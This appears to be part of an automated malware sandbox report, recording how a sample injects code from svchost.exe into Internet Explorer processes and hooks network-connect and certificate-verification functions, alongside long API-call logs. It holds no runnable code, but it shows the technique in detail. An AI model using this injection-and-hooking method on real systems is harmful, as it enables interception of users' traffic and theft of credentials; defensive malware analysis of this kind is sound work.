File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
File	Write	size = 1	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
For performance reasons, the remaining 2212 entries are omitted. The remaining entries can be found in glog.xml.

Process #36: iexplore.exe

123

Information	Value
ID	#36
File Name	c:\program files\internet explorer\iexplore.exe
Command Line	"C:\Program Files\Internet Explorer\iexplore.exe" -nohome
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:03:11, Reason: Injection
Unmonitor	End Time: 00:04:16, Reason: Terminated by Timeout
Monitor Duration	00:01:05

OS Process Information

Information	Value
PID	0xc38
Parent PID	0xc0c (c:\windows\system32\cmd.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B4C 0x E38 0x E00 0x DF4 0x CE8 0x C7C 0x C74 0x C6C 0x C68 0x C64 0x C60 0x C58 0x C50 0x C4C 0x C3C 0x A30 0x 1CC 0x BA8 0x BBC

Hook Information

Type	Installer	Target	Size	Information	Actions
Code	private_0x0000000001a20000:+0x1f86	ws2_32.dll:connect+0x0	5 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000001a20000:+0x1f86	crypt32.dll:CertGetCertificateChain+0x0	5 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000001a20000:+0x1f86	crypt32.dll:CertVerifyCertificateChainPolicy+0x0	5 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000001a20000:+0x1f86	mswsock.dll:ConnectEx+0x0	5 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification

Injection Information

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#35: c:\windows\system32\svchost.exe	0xa3c	address = 0x1a00000, size = 79360	1	Fn Data
Modify Memory	#35: c:\windows\system32\svchost.exe	0xa3c	address = 0x1a13600, size = 32	1	Fn Data
Create Remote Thread	#35: c:\windows\system32\svchost.exe	0xa3c	address = 0x1a13600	1	Fn

Threads

Thread 0xa30

113

Category	Operation	Information	Count	Logfile
Module	Load	module_name = KERNEL32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetExitCodeThread, address_out = 0x76b46ddd	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WaitForSingleObject, address_out = 0x76b5ba90	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = Sleep, address_out = 0x76b5ba46	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateThread, address_out = 0x76b6375d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x76b5ca7c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x76b5cf41	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateFileW, address_out = 0x76b5cc56	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = DecodePointer, address_out = 0x7738cd10	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WriteConsoleW, address_out = 0x76b582f1	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76b6ed38	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76b63d01	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcess, address_out = 0x76b5cdcf	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TerminateProcess, address_out = 0x76b52331	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76b676b5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76b5bb9f	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76b5cac4	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76b5bb80	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76b62fde	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeSListHead, address_out = 0x77395eeb	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76b53ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetStartupInfoW, address_out = 0x76b63891	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleW, address_out = 0x76b6374d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InterlockedExchange, address_out = 0x76b5bf0a	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualFree, address_out = 0x76b61da4	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualAlloc, address_out = 0x76b62fb6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryA, address_out = 0x76b6395c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualProtectEx, address_out = 0x76b9f5d9	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76b633f6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrcmpiA, address_out = 0x76b52249	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapFree, address_out = 0x76b5bbd0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapReAlloc, address_out = 0x7739ff51	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapAlloc, address_out = 0x77382dd6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcessHeap, address_out = 0x76b61280	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x76b48c59	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrcpyA, address_out = 0x76b59793	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapSize, address_out = 0x77389bec	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InterlockedFlushSList, address_out = 0x77383129	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = RtlUnwind, address_out = 0x76b47f70	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetLastError, address_out = 0x76b5bf00	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetLastError, address_out = 0x76b5bb08	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = EnterCriticalSection, address_out = 0x773777a0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77377760	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77389ac5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76b63939	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TlsAlloc, address_out = 0x76b635a1	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TlsGetValue, address_out = 0x76b5da70	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TlsSetValue, address_out = 0x76b5da88	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TlsFree, address_out = 0x76b613b8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FreeLibrary, address_out = 0x76b5d9d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryExW, address_out = 0x76b54775	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = RaiseException, address_out = 0x76b4eb60	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ExitProcess, address_out = 0x76b6214f	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleExW, address_out = 0x76b53e39	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76b6452b	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76b6450e	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LCMapStringW, address_out = 0x76b613d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FindClose, address_out = 0x76b60e62	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FindFirstFileExA, address_out = 0x76b9f3ef	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FindNextFileA, address_out = 0x76b5a187	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsValidCodePage, address_out = 0x76b6c1c0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetACP, address_out = 0x76b639aa	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetOEMCP, address_out = 0x76b53db9	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCPInfo, address_out = 0x76b61e2e	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCommandLineA, address_out = 0x76b698ff	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCommandLineW, address_out = 0x76b6679e	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76b61dbc	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76b61dc3	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetStdHandle, address_out = 0x76b61e46	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetFileType, address_out = 0x76b675a5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetStringTypeW, address_out = 0x76b667c8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetStdHandle, address_out = 0x76b9f589	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WriteFile, address_out = 0x76b61400	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlushFileBuffers, address_out = 0x76b47f81	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetConsoleCP, address_out = 0x76b62c8a	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetConsoleMode, address_out = 0x76b62412	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetFilePointerEx, address_out = 0x76b4f5b2	1	Fn
Module	Load	module_name = WS2_32.dll, base_address = 0x75a90000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = WSAIoctl, address_out = 0x75a92fe7	1	Fn
Module	Load	module_name = SHLWAPI.dll, base_address = 0x771d0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\shlwapi.dll, function = PathFindFileNameA, address_out = 0x771e00aa	1	Fn
Module	Get Address	module_name = c:\windows\system32\shlwapi.dll, function = StrChrA, address_out = 0x771dc5e6	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:19 (UTC)	1	Fn
System	Get Time	type = Performance Ctr, time = 26501802556	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x6c330000	1	Fn
Module	Get Address	module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0	2	Fn
Module	Load	module_name = kernel32, base_address = 0x0	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x76b6418d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x76b676e6	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x6c330000	1	Fn
Module	Get Address	module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0	1	Fn
Module	Load	module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0	2	Fn
Module	Load	module_name = kernel32, base_address = 0x0	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x76b6418d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x76b61e16	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x76b676e6	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
Module	Load	module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0	2	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x76b9f72b	1	Fn
Module	Get Filename	module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\program files\internet explorer\iexplore.exe, file_name_orig = C:\Program Files\Internet Explorer\iexplore.exe, size = 260	1	Fn
Environment	Get Environment String	-	1	Fn Data

Thread 0xba8

Category	Operation	Information	Count	Logfile
Module	Get Filename	module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\program files\internet explorer\iexplore.exe, file_name_orig = C:\Program Files\Internet Explorer\iexplore.exe, size = 260	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ws2_32.dll, base_address = 0x75a90000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = connect, address_out = 0x75a96bdd	1	Fn
Module	Load	module_name = Ws2_32.dll, base_address = 0x75a90000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\crypt32.dll, base_address = 0x75610000	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CertGetCertificateChain, address_out = 0x75626ccf	1	Fn
Module	Load	module_name = crypt32.dll, base_address = 0x75610000	1	Fn
Module	Get Address	module_name = c:\windows\system32\crypt32.dll, function = CertVerifyCertificateChainPolicy, address_out = 0x7562cae2	1	Fn
Module	Load	module_name = crypt32.dll, base_address = 0x75610000	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Module	Get Handle	module_name = c:\program files\internet explorer\iexplore.exe, base_address = 0xc50000	1	Fn

Process #37: iexplore.exe

123

Information	Value
ID	#37
File Name	c:\program files\internet explorer\iexplore.exe
Command Line	"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3128 CREDAT:14337
Initial Working Directory	C:\Users\2XC7u663GxWc\Desktop\
Monitor	Start Time: 00:03:13, Reason: Injection
Unmonitor	End Time: 00:04:16, Reason: Terminated by Timeout
Monitor Duration	00:01:03

OS Process Information

Information	Value
PID	0xc94
Parent PID	0xc38 (c:\program files\internet explorer\iexplore.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x E3C 0x E14 0x E04 0x DFC 0x CE4 0x CE0 0x CDC 0x CD8 0x CD4 0x CD0 0x CCC 0x CC8 0x CB8 0x CB4 0x CAC 0x CA8 0x CA4 0x C9C 0x C98 0x BCC 0x 37C 0x BA4 0x DE4

Hook Information

Type	Installer	Target	Size	Information	Actions
Code	private_0x0000000001ab0000:+0x1f86	ws2_32.dll:connect+0x0	5 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000001ab0000:+0x1f86	crypt32.dll:CertGetCertificateChain+0x0	5 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000001ab0000:+0x1f86	crypt32.dll:CertVerifyCertificateChainPolicy+0x0	5 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000001ab0000:+0x1f86	mswsock.dll:ConnectEx+0x0	5 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification

Injection Information

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#35: c:\windows\system32\svchost.exe	0xa3c	address = 0x1a90000, size = 79360	1	Fn Data
Modify Memory	#35: c:\windows\system32\svchost.exe	0xa3c	address = 0x1aa3600, size = 32	1	Fn Data
Create Remote Thread	#35: c:\windows\system32\svchost.exe	0xa3c	address = 0x1aa3600	1	Fn

Threads

Thread 0xbcc

113

Category	Operation	Information	Count	Logfile
Module	Load	module_name = KERNEL32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetExitCodeThread, address_out = 0x76b46ddd	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WaitForSingleObject, address_out = 0x76b5ba90	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = Sleep, address_out = 0x76b5ba46	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateThread, address_out = 0x76b6375d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x76b5ca7c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x76b5cf41	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateFileW, address_out = 0x76b5cc56	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = DecodePointer, address_out = 0x7738cd10	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WriteConsoleW, address_out = 0x76b582f1	1	Fn
